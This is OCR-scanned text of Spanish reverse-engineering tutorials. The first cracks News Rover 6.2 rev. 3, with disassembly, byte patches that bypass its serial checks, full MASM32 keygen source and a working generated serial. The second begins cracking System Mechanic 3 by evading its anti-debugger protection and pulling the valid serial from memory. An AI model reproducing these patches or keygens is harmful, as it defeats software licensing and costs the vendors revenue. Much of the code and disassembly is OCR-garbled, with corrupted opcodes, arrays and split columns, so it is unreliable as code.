:00457C19 89442424 mov dword ptr [esp+24], eax pone en 83EB6C, 
el valor CDAB3412 

:00457C1D 85C0 test eax, eax 

:00457C1F 750D jne 00457C2E 


Saltamos... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457C1F (C) 


:00457C2E 8D542424 lea edx, dword ptr [esp+24] 83EB6C 
:00457C32 6A04 push 00000004 

:00457C34 52 push edx 

:00457C35 E866010000 call 00457DA0 


Entramos en el call y no parece haber nada interesante hasta que llegamos a este bucle: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address 
| :00457E5D (C) 


:00457DEB 8D542414 lea edx, dword ptr [esp+14] 
:00457DEF 52 push edx 

:00457DF0 6A00 push 00000000 

:00457DF2 E829010000 call 00457F20 

:00457DF7 8BD8 mov ebx, eax 

:00457DF9 8D44241C lea eax, dword ptr [esp+1C] 
:00457DFD 50 push eax 

:00457DFE 6A00 push 00000000 

:00457E00 E81B010000 call 00457F20 

:00457E05 8A1430 mov dl, byte ptr [eax+esi] 


Este bucle se ejecuta dos veces, en la primera ESI =83EB6C (Este registro apunta a una posición de la memoria que 
no siempre es la misma, por lo que esta y otras direcciones que indico aquí, sólo son válidas como referencia) y 
EAX=2 por lo tanto, pone en DL el valor 34. La segunda vez EAX=0 y el valor de DL será CD. 


:00457E08 8A0C33 mov cl, byte ptr [ebx+esi] 


La primera vez, EBX=3 y por lo tanto CL=12, la segunda, EBX=1 y CL= AB. Para no complicar demasiado la 
explicación, en las instrucciones siguientes veremos lo que ocurre en el primer paso por el bucle, y al final del 
mismo, veremos lo que ha ocurrido en el segundo paso. 


:00457E0B 89442420 mov dword ptr [esp+20], eax 
:00457E0F 8D442424 lea eax, dword ptr [esp+24] 
:00457E13 50 push eax 

:00457E14 6A01 push 00000001 


Ahora va a poner un número en la dirección 83EB44: 


:00457E16 C644247000 mov [esp+70], 00 
:00457E1B 884C2471 mov byte ptr [esp+71], cl 
:00457E1F 88542472 mov byte ptr [esp+72], dl 
:00457E23 C644247300 mov [esp+73], 00 


Ahora en 83EB44 tenemos: 00 12 34 00. 


:00457E28 E8F3000000 call 00457F20 

:00457E2D 8B542470 mov edx, dword ptr [esp+70] EDX=00341200 
:00457E31 8BC8 mov ecx, eax ECX=2 
:00457E33 D3EA shr edx, cl EDX=000D0480 


Desplaza los bits dos posiciones a la derecha, lo que equivale a dividir por 4 


:00457E35 8B442428 mov eax, dword ptr [esp+28] 

:00457E39 83C418 add esp, 00000018 

:00457E3C 89542458 mov dword ptr [esp+58], edx pone en 83EB44,el 
valor 80040D00 

:00457E40 8A4C2459 mov cl, byte ptr [esp+59] CL=04 

:00457E44 8A54245A mov dl, byte ptr [esp+5A] DL=0D 

:00457E48 880C33 mov byte ptr [ebx+esil], cl pone en 83EB6F, 04 

:00457E4B 8A4C2458 mov cl, byte ptr [esp+58] CL=80 


:00457E4F OAD1 os al, cel DL=8D 


El programa quiere obtener dos cifras de esta operación: una de ellas será el tercer byte (04) y la otra el resultado de 
"orear" el segundo con el cuarto (0D or 80=8D). 


:00457E51 881430 mov byte ptr [eax+esil], dl pone en 83EB6E,8D 
:00457E54 8B442454 mov eax, dword ptr [esp+54] 

:00457E58 48 dec eax EAX=1 

:00457E59 89442454 mov dword ptr [esp+54], eax 

:00457E5D 758€ jne 00457DEB repite el bucle 


Hemos visto con detalle lo que sucede en el primer paso por el bucle. En el segundo paso, jugamos con otro número: 
00ABCDOO. Al efectuar la instrucción SHR, el valor de ECX es 1, lo que significa que este segundo número se 
divide por dos en vez de por cuatro, lo que da un resultado de 0066D380. Como consecuencia, se coloca el número 
DS en la posición 83EB6D y el E6 en la83EB6C. Así pues, en la posición 83EB6C tenemos el número E6 D5 8D 04 
(Insisto en que esta dirección puede no ser la misma). 


Continuamos nuestro recorrido y llegamos a un nuevo bucle. Este bucle se repite cuatro veces y su misión es la de 
tomar uno a uno los cuatro bytes que forman el número E6 DS 8D 04 y "xorearlos" con los números 17, 76, 51 y 98 
respectivamente, volviéndolos a dejar donde estaban. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457EAE (C) 


:00457E8E 8D542414 lea edx, dword ptr [esp+14] 
:00457E92 52 push edx 

:00457E93 6A00 push 00000000 

:00457E95 E886000000 call 00457F20 

:00457E9A 8A4C2460 mov cl, byte ptr [esp+60] 
:00457E9E 8A1433 mov dl, byte ptr [ebx+esi] 


Aquí DL va tomando los valores E6, D5 etc. 


:00457EA1 32C1 xor al, el 


AL vuelve del call con los valores 17, 76 etc. y se "xorea" con CL que siempre vale 0. Muy útil :0) 


:00457EA3 83C408 add esp, 00000008 
:00457EA6 32D0O xor dl, al 


Esta si es útil. E6 xor 17=F1, DS xor 76=A3, 8D xor 51=DC y 04 xor 98=9C 


:00457EA8 881433 mov byte ptr [ebx+esil], dl 


Aquí los vuelve a colocar en su sitio. 


:00457EAB 43 inc ebx 
:00457EAC 3BDF cmp ebx, edi 
:00457EAE CDE 31 00457E8E repite el bucle 


En este momento tenemos en 83EB6C el número Fl A3 DC 9C. 


A partir de aquí, se pone a hacer cálculos aparentemente innecesarios con estos números, hasta que llegamos a otro 
bucle. Y van... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457F0C (C) 

:00457EF4 8D542414 lea edx, dword ptr [esp+14] 
:00457EF8 8BE8 mov ebp, eax 


:00457EFA 52 push edx 

:00457EFB 6A00 push 00000000 

:00457EFD E81E000000 call 00457F20 

:00457F02 8A0C30 mov cl, byte ptr [eax+esi] 
:00457F05 83C408 add esp, 00000008 
:00457F08 4F dec edi 

:00457F09 880C2E mov byte ptr [esitebpl, cl 
:00457F0C 75E6 jne 00457EF4 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457EF1 (C) 


:00457F0E 881C30 mov byte ptr [eax+esil, bl 
:00457F11 5F pop edi 

:00457F12 5E pop esi 

:00457F13 5D pop ebp 

:00457F14 5B pop ebx 

:00457F15 83C440 add esp, 00000040 
:00457F18 C3 ret 


No me parece necesario dar detalles, sólo decir que hace un desplazamiento de números colocando la última cifra en 
primer lugar, por lo que nuestro número que era F1 A3 DC 9C, ha pasado a ser 9C F1 A3 DC. Recordemos este 
valor porque es fundamental, como veremos más adelante. 


:00457C35 E866010000 call 00457DA0 
:00457C3A 8B44242C mov eax, dword ptr [esp+2C] 


Pongo este trocito de código para recordaros donde estamos, por si lo habíais olvidado :oD 


El programa continua haciendo cálculos y llegamos al cojonésimo bucle, que se efectúa siete veces: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457C7F (C) 


:00457C74 8BE8 mov ebp, eax EBP=DCA3F19C 
:00457C76 83E50F and ebp, 0000000F EBP=0000000€ 
:00457C79 33D5 xor edx, ebp EDX=0000000C 
:00457C7B C1E804 shr eax, 04 EAX=0DCA3F19 
:00457C7E 4E dec esi 

:00457C7F 75F3 jne 00457C74 repite el bucle 
:00457C81 3BD1 cmp edx, ecx 

:00457C83 740D je 00457C92 


Parece claro lo que hace: "xorea" las siete últimas cifras y compara el resultado con la primera. Si coincide, este 
último salto nos permite continuar, en caso contrario, nos echa a los marrajos. La instrucción AND se emplea para 
dejar sólo la última cifra del registro y la SHR hace desaparecer por la derecha la última cifra, para poder coger la 
penúltima. Si quisiéramos parchear el programa, substituiríamos en la dirección de este salto, 74 por EB (cuarto 
byte). Con el número que hemos puesto, no pasamos de aquí, pero como somos unos tramposos, forzamos el salto 
mediante la instrucción r fl z y seguimos nuestro camino... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457C83(C) 


:00457C92 8B6C2420 mov ebp, dword ptr [esp+20] 
:00457C96 33C0 xor eax, eax 

:00457C98 89442410 mov dword ptr [esp+10], eax 
:00457C9C 89442414 mov dword ptr [esp+14], eax 
:00457CA0 807D0000 cmp byte ptr [ebp+00], 00 
:00457CA4 7450 je 00457CF6 


Aquí ha comprobado si se había entrado un nombre, como lo habíamos entrado, nos deja continuar. Aquí entramos 
en el último bucle, el que calcula un número a partir del nombre. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00457CF2 (C) 


:00457CA6 8A4500 mov al, byte ptr [ebp+00] AL=43 (código de "C") 
:00457CA9 25FF000000 and eax, 000000FF 

:00457CAE 8BFO mov esi, eax 

:00457CBO 8BCE mov ecx, esi 

:00457CB2 81El1FFFFO0O000 and ecx, 0O000FFFF 

:00457CB8 51 push ecx 

:00457CB9 E8F5A50900 call 004F22B3 


* Referenced by a CALL at Addresses: 
| :00406A61 , :0040A049 , :00457CB9 , :004634E4 , :004634FB 
:004F22B3 833D849D590001 cmp dword ptr [00599D84], 00000001 
:004F22BA 7El1 jle 004F22CD 


Este call es llamado desde 86 sitios, por lo que supongo que esta comprobación debe ser muy importante, aunque no 
sé para qué, porque el programa por lo que he visto, salta siempre. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :004F22BA(C) 

:004F22CD 8B442404 mov eax, dword ptr [esp+04] 

* Possible StringData Ref from Data Obj ->" COLO Li 

=>" .H" 

:004F22D1 8B0D789B5900 mov ecx, dword ptr [00599B78] ECX apunta ahora 
al inicio de una 
tabla 

:004F22D7 668B0441 mov aX, word ptr [ecx+2*eax] 

:004F22DB 2507010000 and eax, 00000107 

:004F22E0 C3 ret 


Como vemos, cuenta a partir del inicio de la tabla, el doble del valor del código ASCII de la letra, toma el valor que 
hay en esa posición y lo "andea" con 107. Volvemos. 


:00457CBE 83C404 add esp, 00000004 
:00457CC1 85C0 test eax, eax 
:00457CC3 7427 je 00457CEC 


Si el valor que hemos obtenido antes es cero, pasamos a la letra siguiente. 


:00457CC5 6683FE61 cmp si, 0061 
:00457CC9 720€ jb 00457CD7 
:00457CCB 6683FE7A cmp si, 007A 
:00457CCF 7706 ja 00457CD7 
:00457CD1 81C6E0FF0000 add esi, 0000FFEO 


"o" 


Si el código de la letra es mayor que el de "a" y menor que el de "z", le resta 20h. En la práctica, esto quiere decir 
que las cuenta todas como si fueran mayúsculas. 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :00457CC9(C), :00457CCF (C) 


:00457CD7 8B442414 mov eax, dword ptr [esp+14] 
:00457CDB 33F0 xor esi, eax 

:00457CDD 40 inc eax 

:00457CDE 89442414 mov dword ptr [esp+14], eax 
:00457CE2 8B442410 mov eax, dword ptr [esp+10] 
:00457CE6 03C6 add eax, esi 

:00457CE8 89442410 mov dword ptr [esp+10], eax 


Toma el valor que hay en ESP+10, le suma el resultado de las operaciones anteriores, y lo guarda en el mismo lugar. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457CC3 (C) 


:00457CEC 8A4501 mov al, byte ptr [ebp+01] 
:00457CEF 45 inc ebp 

:00457CF0 84C0 test al, al 

:00457CF2 75B2 jne 00457CA6 

:00457CF4 33C0 xor eax, eax 


Coge la letra siguiente, comprueba si no es cero (queda texto por leer), si no lo es, salta al inicio del bucle; en caso 
contrario pasa a la comprobación final (o casi) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457CA4 (C) 


:00457CF6 668B542410 mov dx, word ptr [esp+10] 
:00457CFB 663B542418 cmp dx, word ptr [esp+18] 
:00457D00 740D je 00457DOF 


En DX tenemos las cuatro últimas cifras del número formado a partir del nombre (en mi caso 039B) y en ESP+18, 
aquel número que habíamos encontrado antes: 9C F1 A3 DC. Así pues, la comparación es entre los números 039B y 
F10C ya que la lectura en la memoria se hace empezando por el byte menos significativo, que está en primer lugar, y 
terminando por el más significativo, que esta en último lugar. Como la comparación es con DX, el valor que se lee 
es F19C, si la comparación se hubiera hecho con EBX, el valor hubiera sido DCA3F109C. Espero que haya quedado 
claro :o| 

En todo caso, nos iba a echar de nuevo, y de nuevo hacemos r fl z para forzar el salto. Por cierto, si quisiéramos 
parchear el programa, substituiríamos el 74 por EB (quinto byte). 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457D00(C) 


:00457DO0F 3B3D941F5800 cmp edi, dword ptr [00581F94] 
:00457D15 7DO0D Jjge 00457D24 


¡Animo que ya se acaba! EDI contiene CA, es decir la segunda y tercera cifra de nuestro número chungo (Estos 
números, así como la cuarta cifra que veremos ahora, se determinan entre 457C3A y 457C53) y la experiencia 
demuestra que debe ser igual que el contenido de 581F94 que es 0D. Lo tendremos en cuenta :0) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457D15(C) 

:00457D24 83FF14 cmp edi, 00000014 

:00457D27 “TEOD jle 00457D36 


Otro salto que tenemos que forzar y que se efectuará también con el valor OD que decíamos. Si quisiéramos parchear 
el programa, substituiríamos 7E por EB (sexto byte). 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457D27 (C) 


:00457D36 B901000000 mov ecx, 00000001 

:00457D3B A3981F5800 mov dword ptr [00581F98], eax 
:00457D40 84D9 test el, bl 

:00457D42 741B je 00457D5F 


BL contiene 3, es decir la cuarta cifra de nuestro serial. Este último salto, que yo sepa, sólo tiene que ver con el tipo 
de licencia que nos da el programa, y como antes decía, la experiencia demuestra que es mejor no saltar. A la hora de 
hacer el keygen decidí, con razón o sin ella, que esta cifra fuera el tres. Si quisiéramos parchear el programa, 


substituiríamos 74 1B por 90 90 (séptimo y octavo y último byte). 


¡Muy bien!Con esto hemos terminado la primera parte. Ahora ya sabemos lo que tenemos que hacer para programar 
el keygen. 


Lo primero que hice fue programar un generador de números en Visual Basic, pero el problema del VB en este caso 
es que si quieres hacerle llegar el keygen a alguien y quieres estar seguro de que va a poder ejecutarlo, debes 
enviarle una librería de un tamaño desmesurado en relación a lo que ocupa el keygen. Así que decidí hacerlo con el 
Masm32. 


Para hacer el programa necesitaremos un fichero de recursos y un fichero con el código. 


En el fichero de recursos definiremos todos los elementos que aparecerán en nuestro programa y será algo como 
esto: 


finclude "Amasm32Xincludelresource.h" 


fdefine IDD_DIALOG 1000 
fdefine IDC_NAME 1001 
fdefine IDC_SERIAL 1002 
fdefine IDC_GEN 1003 
fdefine IDC_EXIT 1004 
fdefine IDC_INFO 1005 
fdefine IDC_STATIC -1 


keygen ICON keygen.ico 


IDD_DIALOG DIALOG 100,100,115,65 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "News Rover 6.2 rev. 3" 


FONT 10, "MS Sans Serif" 


¡TEXT "Nombre", IDC_STATIC,8,6,28,12 


TEXT "Serial",IDC_STATIC,8,26,28,12 


EDITTEXT IDC_NAME,36,6,70,12,ES_AUTOHSCROLL | ES_CENTER 


EDITTEXT IDC_SERIAL,36,26,70,12,ES_READONLY | ES_CENTER 


PUSHBUTTON "Generar", IDC_GEN, 8,45,30,14 


PUSHBUTTON "Exit", IDC_EXIT, 42,45,30,14 


PUSHBUTTON "Info",IDC_INFO,76,45,30,14 


Hemos definido: la ventana principal que aparecerá en el centro de la pantalla y tendrá "News Rover...” como título, 
dos textos, dos ventanas de texto, una de ellas con scroll horizontal por si el nombre no cabe y la otra readonly, 
porque sólo el programa debe escribir en ella y tres pulsadores cuya utilidad está clara en el primero y el segundo, y 
en el tercero ya lo veremos... Lo de *+tinclude...resource.h es para no tener que declarar cada una de las constantes 
ES_AUTOHSCROLL, ES_READONLY, etc., ya que este fichero contiene todas estas definiciones. 


Ahora el fichero del código: 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32Xincludewindows.inc 
include c:imasm32Xincludeluser32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.1lib 


.const 

IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_SERIAL EQU 1002 
_GEN EQU 1003 
_EXIT EQU 1004 
IDC_INFO EQU 1005 


DlgFunc PROTO : DWORD, :DWORD, :DWORD, : DWORD 


Operacion PROTO 


.data 

nombre db 30 dup(0 
serial db 10 dup(0 
largo db 02 dup(0), 
nada db 20 dup(0),0 
Icono db "keygen",0 
Iconimage db "keygen",0 

minombre db "CaoS ReptantE",0 

sinnombre db "¡Falta el nombre!",0 

txt1l db "En el programa News Rover hay incluida una ""lista negra"" de 
"crackers y de textos que puedan ser empleados como tanteo (por 
"ejemplo: ""qwerty"" ""xxx"" y un monton más) .",13,10,13,10,3M 
"Esto puede ocasionar que este keygen no funcione y que sea ",X 
"necesario intentarlo con un texto alternativo.",13,10,13,10,1X 


"O a lo peor, es 


"Saludos de CaoS ReptantE 


txt2 db "Importante",0 


el keygen que no anda 


:0(",13,10,13,10,1 


"0 


32 


array db 32, 32, 32, 32, 
arrál db 32. 32, 322 320 
16 
arra3 
16 
arral 
1 
arra5 
arra6 
hInstance dd O 
hIcon da O 

hWnd dd 0 

numero db 12 dup 


32% 
32, 


32, 
327 


32, 
32, 


32, 
32% 


320 
32, 


40, 
32, 


40, 
32% 


40, 
104, 


40, 
16, 


40, 
16, 


32, 
1-6, 


32, 


db 16, 16, 16, 16, 16, 132, 132, 132, 


db 16, 16, 16, 
16, 


2, 


16, 
DIAL 


16, 
2, 


130, 
Lin Li 


130, 
16, 


130, 


Za 16, 16, 


(0),0 


. code 

start: 

invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, addr DlgFunc, NULL 
invoke ExitProcess,NULL 


DlgFunc proc hD1g:DWORD, uUMsg:DWORD, wParam:DWORD, 1lParam: DWORD 
.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,addr Icono 
mov hlIcon,eax 
invoke SendMessage, 


hDl1g, WM_SETICON, 1,hIcon 


16, 


130, 


invoke SetDlglItemText,hDlg,IDC_NAME,ADDR minombre 
.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 
invoke SendMessage,hDlg,WM_CLOSE, 0,0 
.elseif ax==IDC_INFO 
invoke MessageBox,hDlg,ADDR txt1,ADDR txt2,MB_ICONINFORMATION 
.elseif ax==IDC_GEN 
invoke GetDlgltemText,hDlg, IDC_NAME,ADDR nombre, 80 
invoke lstrlen,ADDR nombre 
mov edx,offset largo 
mov dword ptr [edx],eax 
invoke Operacion 
.1f eax== 
invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nada 
invoke SetDlgItemText,hDl1lg,IDC_SERIAL,ADDR sinnombre 
.else 
invoke SetDlgltemText,hDl1g,IDC_SERIAL,ADDR serial 
invoke SetDlgltemText,hDlg, IDC_NAME,ADDR nombre 


.endif 
FEE 
.endif 
.endif 
.endif 


ret 
DlgFunc endp 


Operacion proc 
xXOor ecx,ecx 
mov esi, offset numero 
mov edi,offset nombre 
mov edx, offset array 
invoke lstrlen, offset nombre 
.1f eax < 1 
mov eax,1l 
ret 
.endif 
bucle: xor ebx,ebx 
mov bl,byte ptr[edi] 
.1f ebx== 
jmp siguiente 
.endif 
.1f ebx<80h 
mov al,byte ptr [edx+ebx] 
.else 
xor eax,eax 
.endif 
and eax,107h 
.1f eax== 
jmp pasar 
.endif 
.1f ebx<6lh 
Jjmp seguir 
.endif 
.1f ebx>7Ah 
jmp seguir 
.endif 
add ebx, OFFEOh 
seguir: xor ebx,ecx 
add ebx, dword ptr [esi] 
mov dword ptr [esil],ebx 
inc ecx 
pasar: inc edi 
jmp bucle 


siguiente: mov byte ptr[esi+2],0D3h 


xor 
xor 
mov 
mov 
and 
shr 
xor 
mov 
and 
xor 
mov 
shr 
xor 
xor 
xor 
shl 
mov 
mov 
xor 
mov 
mov 
xor 
mov 
mov 
xor 
mov 
mov 
xor 
mov 
mov 
shl 
mov 
mov 
mov 


ebx, ebx 

ecx, ecx 

b1, byte ptrl[lesi] 
cl,bl 

ebx, 0Fh 

ecx, 4 

ebx, ecx 

cl, byte ptr[esi+1] 
ecx, 0Fh 

ebx, ecx 

cl, byte ptr[esi+1] 
ecx, 4 

ebx, ecx 

ebx, 0Dh 

ebx, 3 

ebx, 4 

byte ptr[esi+3],b1 
bl, byte ptrlesi] 
bl, 98h 
byte ptr[esi+5],b1l 
bl, byte ptr[esi+1] 
b1, 17h 
byte ptr[esi+10],b1 
bl, byte ptr[esi+2] 
bl, 76h 
byte ptr[esi+9],b1 
bl, byte ptr[esi+3] 
b1, 51h 
byte ptr[esi+6],b1l 
ebx,dword ptr [esi+4] 
ebx, 2 

dword ptr [esi],ebx 
bl,byte ptr [esi] 
cl,byte ptr [esi+2] 


or bl,cel 


mov 
mov 
mov 


byte ptr [esi+2],b1 
bl,byte ptr [esi+1] 
cl,byte ptr [esi+3] 


or bl,el 


mov 
mov 
mov 
add 
mov 
shl 
mov 
mov 
mov 


byte ptr [esi+1],b1 
byte ptr [esi],0 
byte ptr [esi+3],0 
esi,4 

ebx,dword ptr [esi+4] 
ebx, 1 

dword ptr [esi],ebx 
bl,byte ptr [esi] 
cl,byte ptr [esi+2] 


or blsecl 


mov 
mov 
mov 


byte ptr [esi+2],b1 
bl,byte ptr [esi+1] 
cl,byte ptr [esi+3] 


or bl,cl 


mov 
mov 
mov 
add 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 


mov 


byte ptr [esi+1],b1 
byte ptr [esi],0 
byte ptr [esi+3],0 
esi,4 
bl,byte ptr [esi-7] 
byte ptr [esi+3],b1 
bl,byte ptr [esi-6 
byte ptr [esi+2],b1 
bl,byte ptr [esi-3] 
byte ptr [esi+1],b1 
bl,byte ptr [esi-2 
byte ptr [esi],bl 


edx,dword ptr [esi 


mov dword ptr [esi],0 
mov dword ptr [esi-4],0 
mov dword ptr [esi-8],0 


mov esi, offset serial 
xor eax,eax 
espacios: mov byte ptr[lesi],32 
.«1f eax < 11 
inc eax 
inc esi 
jmp espacios 
.endif 
dec esi 
mov eax, edx 
mov ecx,10 
otro: cmp eax,ecx 
jb fin 
xor edx,edx 
div ecx 
vr dl, 306 
mov byte ptr[esi],dl 
dec esi 
jmp otro 
fin: or al,30h 
mov byte ptr[esi],al 
xor eax,eax 
ret 


Operacion endp 


end start 


Supongo que sería necesario detallar más el programa, pero esto está resultando demasiado largo, así que si queréis 
alguna aclaración, me podéis dar un toque :0) 


El procedimiento DlgFunc es la base del programa y se ocupa de: 

1”- Condiciones iniciales (WM_INITDIALOO:;: define el icono del programa y pone un nombre ("CaoS ReptantE”) 
por defecto. 

2”- Comprueba si se ha cerrado el programa desde la barra superior (WM_CLOSE) 

3”- Comprueba si se ha pulsado un botón (WM_COMMAND - BN_CLICKED). Si ha sido el de Terminar 
(IDC_EXIT), pues eso, sale. Si ha sido el de info, muestra la ventana de información. Y si ha sido el de Generar ( 
IDC_GEN), comprueba la longitud del nombre, y ejecuta el procedimiento Operacion. Al terminar éste, si la 
longitud del nombre es igual o superior a uno, nos escribe el serial correspondiente al nombre. 


El procedimiento Operacion calcula el número válido, se ocupa de poner espacios en la casilla del serial number 
(para borrar un número que hubiéramos obtenido anteriormente, ya que si fuera más largo, el número resultante sería 
la superposición de ambos) y pasa el serial number obtenido, de hexadecimal a decimal, tras lo cual, vuelve al 
procedimiento principal. Una cosa que hay que hacer notar es que, aunque el programa lo acepta igual, el formato 
del número debe ser XXXX-XXXX-XX, eso es una modificación que se puede hacer al programa y que tampoco es 
nada del otro jueves. 


De hecho, si hacéis los dos archivos como los he hecho yo, y los compiláis, veréis que el programa resultante 
funciona correctamente. Pero como la programación en assembler no es lo mío, estoy seguro de que alguien que 
sepa programar verá muchos defectos, que le agradecería me hiciera saber. 


Como ya hice en mi tuto sobre Teleport, debo mencionar mi deuda con JoTaKe por haberme basado en sus trabajos, 
que podéis encontrar en la Compilación de Tutoriales 2000 v.4.0. 


Ahora que está hecho, vamos a probar si funciona. 


A News Rover 6.2 rev. 3 A ES 
Nombre | CaoS ReptantE 


Serial | 243550761 
Exit | Info | 


Introducimos el número obtenido y... 


Registration successful 


News Rover is now registered for your use. 
You are licensed for the password protection option. 


You are licensed for the handheld device (Palm) option. 


Premio. Pero también había otros premios: 


Registration successful Registration successful 
News Rover is now registered for your use. News Rover is now registered for your use. 
You are licensed for the handheld device (Palm) option. You are licensed for the password protection option. 


Registration successful 


News Rover is now registered for your use 


Antes de despedirme, os recordaré una vez más que si decidís utilizar regularmente el programa, debéis pagar por él, 
para premiar al programador por los buenos ratos que nos ha proporcionado :0) 


Os recuerdo que mi e-mail es: caos_reptante (2hotmail.com 


Por último, quiero mandar un saludo muy cordial a DeK_OiN, saludar también a Act MagO y a Karpoff, desear 
suerte a Mharselo y a Arnau, y por supuesto saludaros a todos los que hayáis llegado hasta aquí. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


KuaTo_ThoR 


INTRODUCCION 


Muy buenas a todos, nuevamente aqui tras un largo descanso sin escribir nada, hasta que he visto este 
programa, con el que pasaremos un buen rato, encontraremos facilmente un número de serie (en realidad 
tres), jugaremos un poco con el programa, lo analizaremos para hacer un keygen (yo lo voy a escribir en 
Pascal, asi que quien quiera probarlo, tendrá que tener un compilador de pascal.) y mucho más. En un 
principo, no pensaba hacer tantas cosas, pero Raziel me convencio para que analizase a fondo la protección 
del programa, y eso es lo que vamos a hacer. Por eso el tuto va a ser un poco largo, pero creo que va a 
merecer la pena. 


El programa está bastante currado, y es una magnifica aplicación de tipo limpiar la mierda' acumulada en 
windows, que como todos sabemos se crea fácilmente. Además nos ayudará a optimizar nuestra conexión y el 
sistema en general. Si os gusta y os resulta útil, ya sabéis que tenéis que hacer. $$ 


Por cierto, en la ayuda podremos ver que el programa tiene tres tipos de registro, Estandar, Profesional e 
Industrial. El totalmente funcional es el registro Industrial. 


AL ATAKE 


Los Números de Serie 


Lo primero de todo, cargamos Sice. Una vez cargado, arrancamos nuestro programa, y... ¡¡¡ Sorpresa !!! se reinicia nuestro PC, 
mmm... ¿qué habrá pasado? pués que el programa tiene una bonita protección antisice, ¡¡ muy original !!, nunca lo había visto. 
Pués nada, volvemos a cargar Sice, y antes de volver a arrancar el programa, cargamos icedump o frogice, o si queréis podéis 
intentar sortear la protección manualmente, eso al gusto del consumidor ;) (al final veremos una forma de saltarnos la 
protección, a mano) 


Ahora sí, el programa arranca sin problema alguno. vemos que hay una opción para meter nuestro nombre y nuestro serial, asi 
que metemos lo que queramos y probamos suerte... vaya por Dios, no hemos tenido suerte, mensaje de error: 


EN) ” 


O License System Mechanic 3 


System Mechanic El 


al 


You have entered an invalid User ID or Serial Number. 
For assistance please contact your software vendor. 


Ok, nada del otro mundo, vamos a Softice (Ctrl+D), y metemos unos cuantos bpx, para no andarnos por las ramas, los más 
usuales, bpx GetWindowTexta, bpx GetDlgitemTexta, bpx GetDlgitemInt. Salimos de Sice (FS) y pulsamos OK. Salta sice, ha 
sido Getwindowtexta, suponemos que en la primera lee el nombre, como es nombre y n” de serie, pulsamos FS una vez más, 
para que lea el n* de serie. Vuelve a saltar sice, ya podemos quitar el breakpoint (bc*). Ahora pulsamos F12 hasta que aparezca 
el nombre de nuestro programa en la linea verde que aparece en Softice. Aparece Sysmechanic tras pulsar una vez F12, para 
ahorrar tiempo pulsamos una vez más F12, y volvemos a aparecer en el programa, en una zona bastante curiosa: 


D15F:OOS5O0O0CCB  C3 

015F:00500Ccc  BS900D5000 EAX, DOSDOD90 
015F:00500CD1 EFFFFFF 00500COo4 
015F:00500CD6 54C0 

D15F:00500CDS OFSS J¡ODODO 

D15F : OOSOOCDE 140D5000 

015F : OOSOOCES3S s1CFFFFFF 

D15F:O0500CES  54C€C0 

D1SF:OOS5SDOCEA OFSS 


Si pasamos este mov (con F10) e introducimos d eax en sice, nos aparecerá lo siguiente en la ventana de datos: 


0167 94 4D 20 53 79 73-00 DO FF DAMN 
0167 06 00 00 00 52 21 53 43-27 53 00 00 FF ....RIS 


0167 035 00 00 00 70 63 79 73-6 ; 7239 OO 00 00 00 ... +] POysmkey.... 


0167 FF FF 

0167:00500DDO 73 8 65 72 00 00 00 0O0-FF 

0167:00500DEO 44 75 65 9 73 74 O0-FF 

0167:00500DFO 21 

0167:00500E00 OB 

0167:00500E10 

0167: 00500E20 

0167:00500E30 6 JB 6 22 DO 00 00 O0-FF 

0167:00500E40 4B € 79 67 72-61 
FF 06 00 DO-2D 


Vaya, vaya, ahora ¿qué coño es esto? . Pues bien. a mi entender, lo que está haciendo es mirar si existe algún programa 
ejecutandose cuyo nombre contenga a estas palabras, podéis probar, solo hay que cambiar el nombre a cualquier aplicación 
poniendo por ejemplo de nombre 'DAMN Sys' y podréis comprobar como vuestro PC se reinicia automaticamente, estos tios 
cada vez me gustan más, jejeje. Continuemos con lo nuestro... seguimos trazando con F10, pasando todas estas comparaciones, 
sin saltar en ninguna de ellas, hasta que salimos del call. (cuando pasamos por el Ret). 


Continuamos atentamente con Fl0, fijandonos en los valores de los registros (si no los véis F2). Hasta que al pasar por 
004900AC vemos que al poner d eax aparece en la ventana de datos nuestro nombre, ahora estamos cerca, hay que tener 
mucho cuidado al pasar por encima de las call's. Justo al pasar por la siguiente llamada, vemos que en la ventana de datos justo 
debajo de nuestro nombre, aparece un extraño número, y justo bajo de ese extraño número, aparece uno aún más extraño, del 
tipo xxxxx-STxxx-XXXXXXXXXx, realmente extraño ;-) creo que está bastante claro lo que es. Después de tantas precauciones, y 
nos brindan el número en bandeja, mmm... Podemos fijarnos en que poco después de esta llamada, hay otra seguida de una 
comparación, este podría ser el esquema: 


D15F:004900B7 ó DODO4FE97C€ 
D15F:0049005EC 5B45F85 EAX, [EBP-08] 
D15F:004900EF S5B55FC EDX, [EBP-04] 
D15F 3 00403F14 


